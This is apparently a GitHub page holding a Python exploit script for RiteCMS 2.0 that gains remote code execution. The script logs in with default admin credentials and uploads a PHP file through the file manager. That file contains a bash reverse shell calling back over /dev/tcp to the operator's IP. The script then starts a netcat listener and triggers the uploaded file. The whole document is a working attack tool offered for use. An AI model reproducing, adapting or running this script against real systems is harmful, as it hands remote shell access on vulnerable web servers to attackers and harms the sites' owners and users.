-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathritecms2.0-exploit.py
More file actions
103 lines (86 loc) · 3.87 KB
/
ritecms2.0-exploit.py
File metadata and controls
103 lines (86 loc) · 3.87 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
import argparse
import requests
import subprocess
# Banner
def print_banner():
print("""
##############################################################
# RiteCMS 2.0 Remote Code Execution #
# Author: PickleRick #
# https://github.com/pjobsina #
##############################################################
""")
# Parse command-line arguments
def parse_args():
parser = argparse.ArgumentParser(description='Exploit script to upload a reverse shell and execute it.')
parser.add_argument('-i', '--ip', required=True, help='Your IP address')
parser.add_argument('-p', '--port', required=True, help='Your desired port')
parser.add_argument('-t', '--target', required=True, help='Target IP address')
args = parser.parse_args()
return args.ip, args.port, args.target
# Main exploit function
def exploit(reverse_shell_ip, reverse_shell_port, target_ip):
# Prepare URLs and headers
login_url = f'http://{target_ip}/cms/index.php'
upload_url = f'http://{target_ip}/cms/index.php?mode=filemanager&action=upload&directory=media'
execute_url = f'http://{target_ip}/media/rev-shell.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Referer': f'http://{target_ip}/cms/',
'Upgrade-Insecure-Requests': '1',
'Origin': f'http://{target_ip}',
}
# Login credentials
login_data = {'username': 'admin', 'userpw': 'admin'}
# File content to upload
files = {
'file': ('rev-shell.php', f"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{reverse_shell_ip}/{reverse_shell_port} 0>&1'\"); ?>", 'application/x-php')
}
# Form data for uploading
upload_data = {
'mode': 'filemanager',
'directory': 'media',
'file_name': '',
'upload_mode': '1',
'resize_xy': 'x',
'resize': '640',
'compression': '80',
'thumbnail_resize_xy': 'x',
'thumbnail_resize': '150',
'thumbnail_compression': '70',
'upload_file_submit': 'OK - Upload file'
}
with requests.Session() as session:
# Send POST request to log in
login_response = session.post(login_url, headers=headers, data=login_data)
if login_response.ok:
print("[*] AUTHENTICATION BYPASSED!")
# Use the same session for the upload
upload_response = session.post(upload_url, headers=headers, files=files, data=upload_data)
# Debugging: Check the status code and response text
print(f"[*] SHELL UPLOADED!")
if upload_response.ok:
print("[*] REVERSE SHELL UPLOADED!")
# Print and execute the Netcat listener command
listener_command = f"rlwrap nc -nlvp {reverse_shell_port}"
print(f"\n[*] STARTING NETCAT LISTENER:\n{listener_command}")
# Execute the Netcat listener command
subprocess.Popen(listener_command, shell=True)
# Execute the uploaded reverse shell file
execute_response = session.get(execute_url)
if execute_response.ok:
print("[*] EXECUTION SUCCESSFUL!")
else:
print("[x] EXECUTION FAILED!")
else:
print("[x] UPLOAD FAILED!")
else:
print("[x] LOGIN FAILED!")
if __name__ == '__main__':
print_banner()
reverse_shell_ip, reverse_shell_port, target_ip = parse_args()
exploit(reverse_shell_ip, reverse_shell_port, target_ip)